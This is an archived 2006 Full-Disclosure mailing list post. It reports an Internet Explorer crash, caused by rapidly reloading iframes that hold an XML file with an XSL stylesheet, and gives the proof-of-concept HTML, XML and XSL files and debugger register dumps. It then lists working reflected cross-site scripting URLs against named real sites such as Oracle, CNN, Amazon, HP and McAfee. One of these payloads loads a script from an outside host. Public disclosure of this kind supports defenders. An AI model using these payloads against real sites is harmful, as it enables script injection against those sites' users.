[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] bugs
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] bugs
- From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
- Date: Sun, 6 Aug 2006 11:48:18 +0200
Hi,
I have found ie crashing when refreshing an iframe containing an xml file
with xsl stylesheet (takes a while to crash).
I used this html:
---------------------------------
<html>
<head>
<script language="javaScript">
function refresh() {
frames[0].window.location.reload();
setTimeout("refresh();", 20);
}
</script>
</head>
<body><iframe src="input.xml"></iframe>
<script>
refresh();
</script>
</body>
</html>
----------------------------------
input.xml is calling an xsl stylesheet (cfr. attachment)
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="style2.xsl"?>
----------------------------------
w2k:
msxml3.dll:69B76B61 mov eax, [esi]
msxml3.dll:69B76B63 mov ecx, esi
msxml3.dll:69B76B65 call dword ptr [eax+48h]
with esi=0
MSHTML.DLL:637840E8 test byte ptr [eax+44Dh], 20h
with eax=0
xp:
msxml3.dll:74992156 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
EBX=0
seem like nullpointer derefs.
Weird thing it crashes on different addies, somebody can shed some light on
why is this?
obligatory xss:
http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=Allsecure
search, lol?
oreilly.com: search powered by
http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=
http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0
http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn
<http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn>
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir
http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0
http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url=search-alias%3Daps
&field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&Go.x=11&Go.y=10
http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0
http://us.mcafee.com/virusInfo/ : enter following in virus search: (use POST
form for exploit)
"><script>alert(1)</script>
cheers,
Thomas
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="style2.xsl"?>
<devguru_staff>
<programmer>
<name>Bugs Bunny</name>
<dob>03/21/1970</dob>
<age>31</age>
<address>4895 Wabbit Hole Road</address>
<phone>865-111-1111</phone>
</programmer>
<programmer>
<name>Daisy Duck</name>
<dob>08/09/1949</dob>
<age>51</age>
<address>748 Golden Pond</address>
<phone>865-222-2222</phone>
</programmer>
<programmer>
<name>Minnie Mouse</name>
<dob>04/13/1977</dob>
<age>24</age>
<address>4064 Cheese Factory Blvd</address>
<phone>865-333-3333</phone>
</programmer>
<programmer>
<name>Pluto</name>
<dob>07/04/1979</dob>
<age>21</age>
<address>414 Dog Lane</address>
<phone>865-333-3333</phone>
</programmer>
<programmer>
<name>Porky Pig</name>
<dob>11/30/1956</dob>
<age>44</age>
<address>555 Mud Pit Pike</address>
<phone>865-444-4444</phone>
</programmer>
<programmer>
<name>Road Runner</name>
<dob>01/19/1953</dob>
<age>48</age>
<address>135 Desert View Street</address>
<phone>none</phone>
</programmer>
</devguru_staff>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"; version="1.0">
<xsl:template match="/">
<html>
<body>
<xsl:for-each select="devguru_staff/programmer">
<div>
NAME: <xsl:value-of select="name" />
<br />
DOB: <xsl:value-of select="dob" />
<br />
AGE: <xsl:value-of select="age" />
<br />
ADDRESS: <xsl:value-of select="address" />
<br />
PHONE: <xsl:value-of select="phone" />
<hr />
</div>
</xsl:for-each>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
<html>
<head>
<script language="javaScript">
function refresh() {
var i = 0;
while ( frames [i] )
frames[i++].window.location.reload();
setTimeout("refresh();", 10);
}
</script>
</head>
<body>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<input type="button" onclick="refresh()" value="Test" />
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/